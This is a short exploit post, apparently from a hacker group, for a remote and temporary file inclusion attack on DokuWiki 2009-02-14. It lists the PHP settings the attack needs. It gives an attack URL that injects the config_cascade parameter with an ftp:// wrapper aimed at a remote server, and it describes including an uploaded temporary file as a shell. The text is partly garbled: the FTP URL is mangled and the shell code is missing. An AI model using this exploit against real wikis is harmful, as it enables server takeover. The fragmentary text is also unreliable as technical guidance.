Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit tested and working I was reading: by girex [quote] It's not a RFI couse use of file_exists function. [/quote] How wrong brother! trick 1 (ftp:// wrapper with php 5): needs register_globals = on allow_url_fopen = On (default) allow_url_include = On (not default) http://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:anon@>out.txt trick 2: needs register_globals = on file_uploads = On (default) include a temporary file passed by the $_FILES[] array:
where your shell is like: because when there is no prefix or suffix for the affected var, it remains like this: /path_to_temporary_folder/php93.tmp ! Nine:Situations:Group::pyrokinesis site: